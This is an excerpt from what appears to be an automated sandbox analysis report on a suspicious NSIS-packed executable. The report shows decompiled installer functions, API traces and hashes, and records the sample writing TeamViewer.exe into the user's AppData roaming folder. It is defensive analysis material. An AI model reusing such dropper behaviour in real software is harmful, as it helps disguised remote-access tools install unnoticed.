                                                                                                                        0x0040220e
                                                                                                                        0x0040220e
                                                                                                                        0x0040220e
                                                                                                                        0x00401831
                                                                                                                        0x0040182a
                                                                                                                        0x00402896
                                                                                                                        0x0040289a
                                                                                                                        0x0040289a
                                                                                                                        0x0040185e
                                                                                                                        0x00401863
                                                                                                                        0x00401871
                                                                                                                        0x00401876
                                                                                                                        0x0040187c
                                                                                                                        0x00401880
                                                                                                                        0x00401882
                                                                                                                        0x0040188a
                                                                                                                        0x00401896
                                                                                                                        0x00401884
                                                                                                                        0x00401884
                                                                                                                        0x00401888
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00401888
                                                                                                                        0x0040189f
                                                                                                                        0x004018a5
                                                                                                                        0x004018a7
                                                                                                                        0x00000000
                                                                                                                        0x004018ad
                                                                                                                        0x004018ad
                                                                                                                        0x004018b0
                                                                                                                        0x004018c8
                                                                                                                        0x004018b2
                                                                                                                        0x004018b5
                                                                                                                        0x004018ba
                                                                                                                        0x004018bd
                                                                                                                        0x004018be
                                                                                                                        0x004018be
                                                                                                                        0x004018cd
                                                                                                                        0x004018d2
                                                                                                                        0x00402209
                                                                                                                        0x00000000
                                                                                                                        0x00402209
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00401773
                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,00409B70,00409B70,00000000,00000000,00409B70,C:\Users\user\AppData\Roaming\TeamViewer,00000000,00000000,00000031), ref: 0040179D
                                                                                                                          • Part of subcall function 00405B66: lstrcpyn.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                          • Part of subcall function 00404F04: lstrlen.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                          • Part of subcall function 00404F04: lstrcat.KERNEL32(0041FC78,00402C4A), ref: 00404F60
                                                                                                                          • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                          • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                        Strings
                                                                                                                        • "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe", xrefs: 00401801, 0040181D
                                                                                                                        • C:\Users\user\AppData\Roaming\TeamViewer, xrefs: 00401761
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                        • String ID: "C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe"$C:\Users\user\AppData\Roaming\TeamViewer
                                                                                                                        • API String ID: 1941528284-3061885024
                                                                                                                        • Opcode ID: 25b6faa114f588d1f498fd06d837c8ef74ac19732cdb1ade2be67fffb197f127
                                                                                                                        • Instruction ID: ca24b6133afb507e547736dc5ab02d451b7f1a2d30e0a517c5ad6537af4b780a
                                                                                                                        • Opcode Fuzzy Hash: 25b6faa114f588d1f498fd06d837c8ef74ac19732cdb1ade2be67fffb197f127
                                                                                                                        • Instruction Fuzzy Hash: 8441C131900515BBCB10BFB5DD46EAF3A79EF01369B24433BF511B11E1D63C9A418AAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00402F18, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 109fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 93%
                                                                                                                        			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x417044 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E00403043(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417044 =  *0x417044 + _t57;
						_t32 = E00403043(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409018, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417044 =  *0x417044 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413040, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417044 =  *0x417044 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}

















                                                                                                                        0x00402f1d
                                                                                                                        0x00402f27
                                                                                                                        0x00402f30
                                                                                                                        0x00402f34
                                                                                                                        0x00402f3f
                                                                                                                        0x00402f3f
                                                                                                                        0x00402f47
                                                                                                                        0x00402f49
                                                                                                                        0x00402f50
                                                                                                                        0x00402f6c
                                                                                                                        0x00402f70
                                                                                                                        0x00403039
                                                                                                                        0x00403039
                                                                                                                        0x00000000
                                                                                                                        0x00402f7f
                                                                                                                        0x00402f82
                                                                                                                        0x00402f88
                                                                                                                        0x00402f8f
                                                                                                                        0x00402f92
                                                                                                                        0x00402f9b
                                                                                                                        0x00403008
                                                                                                                        0x0040300e
                                                                                                                        0x00403010
                                                                                                                        0x00403010
                                                                                                                        0x00403022
                                                                                                                        0x00403026
                                                                                                                        0x00000000
                                                                                                                        0x00403028
                                                                                                                        0x00403028
                                                                                                                        0x0040302b
                                                                                                                        0x00403031
                                                                                                                        0x00000000
                                                                                                                        0x00403031
                                                                                                                        0x00402f9d
                                                                                                                        0x00402fa0
                                                                                                                        0x00403034
                                                                                                                        0x00403034
                                                                                                                        0x00402fa6
                                                                                                                        0x00402fab
                                                                                                                        0x00402fab
                                                                                                                        0x00402fb3
                                                                                                                        0x00402fb5
                                                                                                                        0x00402fb5
                                                                                                                        0x00402fc6
                                                                                                                        0x00402fca
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00402fde
                                                                                                                        0x00402fe6
                                                                                                                        0x00403004
                                                                                                                        0x0040303b
                                                                                                                        0x0040303b
                                                                                                                        0x00402fed
                                                                                                                        0x00402fed
                                                                                                                        0x00402ff0
                                                                                                                        0x00402ff3
                                                                                                                        0x00402ff6
                                                                                                                        0x00403000
                                                                                                                        0x00000000
                                                                                                                        0x00403002
                                                                                                                        0x00000000
                                                                                                                        0x00403002
                                                                                                                        0x00403000
                                                                                                                        0x00000000
                                                                                                                        0x00402fe6
                                                                                                                        0x00000000
                                                                                                                        0x00402fab
                                                                                                                        0x00402fa0
                                                                                                                        0x00402f9b
                                                                                                                        0x00402f92
                                                                                                                        0x00402f70
                                                                                                                        0x0040303c
                                                                                                                        0x00403040

                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402F3F
                                                                                                                        • ReadFile.KERNELBASE(00409130,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
                                                                                                                        • ReadFile.KERNELBASE(00413040,00004000,?,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FC6
                                                                                                                        • WriteFile.KERNELBASE(00000000,00413040,?,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FDE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Read$PointerWrite
                                                                                                                        • String ID: @0A$wRN
                                                                                                                        • API String ID: 2113905535-3750349230
                                                                                                                        • Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                                        • Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
                                                                                                                        • Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                                        • Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403043, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E00403043(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t53;

				_t35 =  *0x417044; // 0x4e5277
				_t37 = _t35 -  *0x40afb0 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BD3(1);
					return 0;
				}
				E004031F1( *0x41f054);
				SetFilePointer( *0x409018,  *0x40afb0, 0, 0); // executed
				 *0x41f050 = _t37;
				 *0x417040 = 0;
				while(1) {
					_t12 =  *0x417048; // 0x1bbf66
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f054;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031BF(0x413040, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f054 =  *0x41f054 + _t34;
					 *0x40afd0 = 0x413040;
					 *0x40afd4 = _t34;
					L6:
					L6:
					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
						 *0x417040 =  *0x41f050 -  *0x417044 - _a4 +  *0x40afb0;
						E00402BD3(0);
					}
					 *0x40afd8 = 0x40b040;
					 *0x40afdc = 0x8000; // executed
					_t16 = E00405F82(0x40afb8); // executed
					if(_t16 < 0) {
						goto L21;
					}
					_t39 =  *0x40afd8; // 0x40deec
					_t40 = _t39 - 0x40b040;
					if(_t40 == 0) {
						__eflags =  *0x40afd4; // 0x0
						if(__eflags != 0) {
							goto L21;
						}
						__eflags = _t34;
						if(_t34 == 0) {
							goto L21;
						}
						L17:
						_t18 =  *0x417044; // 0x4e5277
						if(_t18 -  *0x40afb0 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x409018, _t18, 0, 0); // executed
						goto L23;
					}
					_t21 = WriteFile( *0x409018, 0x40b040, _t40,  &_v4, 0); // executed
					if(_t21 == 0 || _t40 != _v4) {
						_push(0xfffffffe);
						L22:
						_pop(_t17);
						return _t17;
					} else {
						 *0x40afb0 =  *0x40afb0 + _t40;
						_t53 =  *0x40afd4; // 0x0
						if(_t53 != 0) {
							goto L6;
						}
						goto L17;
					}
					L21:
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}


















                                                                                                                        0x00403047
                                                                                                                        0x00403054
                                                                                                                        0x00403067
                                                                                                                        0x0040306c
                                                                                                                        0x004031ad
                                                                                                                        0x004031af
                                                                                                                        0x00000000
                                                                                                                        0x004031b5
                                                                                                                        0x00403078
                                                                                                                        0x0040308b
                                                                                                                        0x00403091
                                                                                                                        0x00403097
                                                                                                                        0x004030a2
                                                                                                                        0x004030a2
                                                                                                                        0x004030a7
                                                                                                                        0x004030ac
                                                                                                                        0x004030b4
                                                                                                                        0x004030b6
                                                                                                                        0x004030b6
                                                                                                                        0x004030bf
                                                                                                                        0x004030c6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004030cc
                                                                                                                        0x004030d2
                                                                                                                        0x004030d8
                                                                                                                        0x00000000
                                                                                                                        0x004030de
                                                                                                                        0x004030e4
                                                                                                                        0x00403104
                                                                                                                        0x00403109
                                                                                                                        0x0040310e
                                                                                                                        0x00403114
                                                                                                                        0x0040311a
                                                                                                                        0x00403124
                                                                                                                        0x0040312b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040312d
                                                                                                                        0x00403133
                                                                                                                        0x00403135
                                                                                                                        0x00403169
                                                                                                                        0x0040316f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403171
                                                                                                                        0x00403173
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403175
                                                                                                                        0x00403175
                                                                                                                        0x00403188
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403197
                                                                                                                        0x00000000
                                                                                                                        0x00403197
                                                                                                                        0x00403145
                                                                                                                        0x0040314d
                                                                                                                        0x004031a4
                                                                                                                        0x004031aa
                                                                                                                        0x004031aa
                                                                                                                        0x00000000
                                                                                                                        0x00403155
                                                                                                                        0x00403155
                                                                                                                        0x0040315b
                                                                                                                        0x00403161
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403167
                                                                                                                        0x004031a8
                                                                                                                        0x004031a8
                                                                                                                        0x00000000
                                                                                                                        0x004031a8
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 00403058
                                                                                                                          • Part of subcall function 004031F1: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000), ref: 0040308B
                                                                                                                        • WriteFile.KERNELBASE(0040B040,0040DEEC,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403145
                                                                                                                        • SetFilePointer.KERNELBASE(004E5277,00000000,00000000,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000,00000000,?,?), ref: 00403197
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Pointer$CountTickWrite
                                                                                                                        • String ID: @0A$wRN
                                                                                                                        • API String ID: 2146148272-3750349230
                                                                                                                        • Opcode ID: 09db56204c7f15284c341d007dee54cfa9a87c515f6ef0f82ef5e9c09c89c7a4
                                                                                                                        • Instruction ID: c862c83604f3b109b9ae356e59bf9e99270c6d64ee518f880403d0392c1b0dc8
                                                                                                                        • Opcode Fuzzy Hash: 09db56204c7f15284c341d007dee54cfa9a87c515f6ef0f82ef5e9c09c89c7a4
                                                                                                                        • Instruction Fuzzy Hash: 4B41ABB25042029FD710CF29EE4096A7FBDF748356705423BE501BA2E1CB3C6E099B9E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E004056ED(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405684(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B66("C:\\Users\\engineer\\AppData\\Roaming\\TeamViewer", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                                        0x004015b3
                                                                                                                        0x004015ba
                                                                                                                        0x004015bd
                                                                                                                        0x004015c2
                                                                                                                        0x004015c6
                                                                                                                        0x004015c8
                                                                                                                        0x004015d0
                                                                                                                        0x004015d6
                                                                                                                        0x004015d8
                                                                                                                        0x004015db
                                                                                                                        0x004015e3
                                                                                                                        0x004015f0
                                                                                                                        0x004015fd
                                                                                                                        0x004015fd
                                                                                                                        0x004015f2
                                                                                                                        0x004015f3
                                                                                                                        0x004015fb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004015fb
                                                                                                                        0x004015f0
                                                                                                                        0x00401600
                                                                                                                        0x00401603
                                                                                                                        0x00401605
                                                                                                                        0x00401606
                                                                                                                        0x004015c8
                                                                                                                        0x0040160d
                                                                                                                        0x0040162d
                                                                                                                        0x00402164
                                                                                                                        0x0040160f
                                                                                                                        0x00401611
                                                                                                                        0x0040161c
                                                                                                                        0x00401622
                                                                                                                        0x00401622
                                                                                                                        0x0040288e
                                                                                                                        0x0040289a

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,747DF560,0040549F,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,747DF560), ref: 004056FB
                                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
                                                                                                                          • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F
                                                                                                                        • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\TeamViewer,00000000,00000000,000000F0), ref: 00401622
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Roaming\TeamViewer, xrefs: 00401617
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\TeamViewer
                                                                                                                        • API String ID: 3751793516-4213038595
                                                                                                                        • Opcode ID: 6e6337e4574b2f3d3c7585ac3713e6f4ce480bba84fd94b859fb097d5a284765
                                                                                                                        • Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
                                                                                                                        • Opcode Fuzzy Hash: 6e6337e4574b2f3d3c7585ac3713e6f4ce480bba84fd94b859fb097d5a284765
                                                                                                                        • Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                                        0x00405870
                                                                                                                        0x00405876
                                                                                                                        0x00405877
                                                                                                                        0x00405877
                                                                                                                        0x00405878
                                                                                                                        0x0040587f
                                                                                                                        0x00405889
                                                                                                                        0x00405896
                                                                                                                        0x00405899
                                                                                                                        0x004058a1
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004058a5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004058a7
                                                                                                                        0x00000000
                                                                                                                        0x004058a7
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 0040587F
                                                                                                                        • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405899
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                        • String ID: "C:\Users\user\Desktop\77Etc0bR2v.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                        • API String ID: 1716503409-319305030
                                                                                                                        • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                        • Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
                                                                                                                        • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                        • Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 86%
                                                                                                                        			E00403208(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
				E00405DC8(_t6);
				_t2 = E004056C6(_t6);
				if(_t2 != 0) {
					E00405659(_t2, _t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040586C("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                                                        0x00403209
                                                                                                                        0x0040320f
                                                                                                                        0x00403215
                                                                                                                        0x0040321c
                                                                                                                        0x00403221
                                                                                                                        0x00403229
                                                                                                                        0x00403235
                                                                                                                        0x0040323b
                                                                                                                        0x0040321f
                                                                                                                        0x0040321f
                                                                                                                        0x0040321f

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                          • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                        • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00403229
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 4115351271-3512041753
